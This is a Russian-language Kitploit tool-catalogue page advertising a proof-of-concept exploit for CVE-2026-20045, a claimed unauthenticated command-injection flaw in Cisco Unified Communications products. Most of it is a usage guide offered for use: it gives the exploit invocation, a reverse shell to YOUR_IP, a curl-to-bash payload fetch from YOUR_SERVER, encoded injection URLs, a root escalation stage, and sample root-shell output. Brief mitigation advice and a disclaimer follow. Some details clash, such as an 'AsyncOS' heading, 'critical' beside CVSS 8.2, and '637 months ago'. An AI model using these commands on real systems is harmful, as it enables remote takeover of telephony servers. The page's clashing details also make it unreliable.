Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Ashwesker-CVE-2026-20045 — Эксплойт proof-of-concept для CVE-2026-20045, критической уязвимости неаутентифицированного удалённого выполнения кода (RCE) в продуктах Cisco Unified Communications, позволяющей выполнить инъекцию команд и получить обратную оболочку с повышением привилегий до root. | Kitploit
Инструменты/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

Эксплойт proof-of-concept для CVE-2026-20045, критической уязвимости неаутентифицированного удалённого выполнения кода (RCE) в продуктах Cisco Unified Communications, позволяющей выполнить инъекцию команд и получить обратную оболочку с повышением привилегий до root.

Репозиторий
637 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 CVE-2026-20045 — Разбор Zero-Day уязвимости 🚨

Cisco AsyncOS 0-Day Vulnerability

🧨 Что это такое

Критическая уязвимость удалённого выполнения кода (RCE), затрагивающая несколько продуктов Cisco Unified Communications. Она активно эксплуатировалась в реальных атаках до выпуска патчей.


🔥 Почему это опасно

  • 🚫 Не требуется аутентификация
  • 🖥️ Удалённое выполнение кода
  • 👑 Потенциальный доступ уровня root
  • 🌍 Подтверждённая эксплуатация в реальном мире

Это означает, что злоумышленник может полностью захватить контроль над уязвимыми системами удалённо.


🚨 Примеры использования CVE-2026-20045.py

Вот отполированное руководство с примерами использования для запуска PoC-скрипта, включая точно то, что вы увидите в своём терминале, если эксплойт сработает на уязвимой цели Cisco Unified Communications (непропатченный веб-интерфейс открыт). Я добавил немного эстетики с эмодзи, цветными блоками кода (через markdown) и структурированными разделами для лучшей читаемости. 😎

1. Базовый тест информации о системе

Эта команда выполняет простые команды для получения ID пользователя, имени пользователя и сведений о системе.

Команда:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"  

Что вы увидите, если всё сработает (Успешный вывод):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj  
[*] Initial command: id && whoami && uname -a  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  

[+] Possible command output:  
------------------------------------------------------------  
uid=0(root) gid=0(root) groups=0(root)  
root  
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux  
------------------------------------------------------------  

🔑 Ключевые признаки: Зелёные индикаторы [+], статус HTTP 200 и результаты команд в блоке вывода. Если вывод не отображается, но статус 200 — это всё равно сработало молча!

2. Настройка обратного шелла

Эта команда запускает интерактивный шелл обратно на вашу машину. Сначала запустите слушатель: nc -lvnp 4444.

Команда:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"  

Что вы увидите, если всё сработает (В терминале скрипта):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==  
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

Что вы увидите в терминале слушателя (nc):

root@kitploit:~
listening on [any] 4444 ...  
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321  
bash: cannot set terminal process group (1234): Inappropriate ioctl for device  
bash: no job control in this shell  
root@ucm-server:~# id  
uid=0(root) gid=0(root) groups=0(root)  
root@ucm-server:~#  

🚀 Ключевые признаки: Скрипт показывает сообщения об успехе; слушатель получает немедленное приглашение root-шелла. Вводите команды там для взаимодействия!

3. Загрузка и выполнение файла (например, кастомный пейлоад)

Эта команда загружает и запускает скрипт с вашего сервера.

Команда:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"  

Что вы увидите, если всё сработает (Успешный вывод):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=  
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash  
[+] Stage 1 likely succeeded! Status: 200  
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=  
[+] Stage 2 (root escalation) likely succeeded! Status: 200  
[+] Command executed silently (check target for effects)  

📥 Ключевые признаки: Коды статуса 200; проверьте цель (например, логи/файлы) или ваш сервер (логи загрузок). Прямого вывода нет, если пейлоад молчаливый.

💡 Профессиональные советы:

  • Запускайте с sudo, если нужны сетевые привилегии.
  • Используйте HTTPS-цели; скрипт обрабатывает самоподписанные сертификаты.
  • Если не сработало (например, 404/403), попробуйте другие пути или проверьте, пропатчена ли цель.
  • Всегда тестируйте этично! 😈

🧩 Затронутые продукты

  • ☎️ Cisco Unified Communications Manager (Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition (SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 Первопричина

Некорректная проверка пользовательского ввода в HTTP-интерфейсах управления, что позволяет инъекцию команд, приводящую к удалённому выполнению кода.


📊 Серьёзность

  • Оценка CVSS: 8.2 (Высокая)
  • Влияние на бизнес: Критическое

🛡️ Смягчение и защита

  • ⚡ Немедленно примените патчи Cisco
  • 🔒 Ограничьте доступ к интерфейсам управления
  • 🌐 Не подвергайте системы прямому доступу из интернета
  • 👀 Отслеживайте логи на предмет подозрительной HTTP-активности
  • 🏛️ Следуйте государственным рекомендациям по устранению уязвимостей, если применимо

🔒 Отказ от ответственности:

Весь PoC-код предназначен только для этического, образовательного использования на авторизованных системах. Несанкционированная эксплуатация незаконна; ответственность за неправомерное использование не принимается. 😈

Скачать инструмент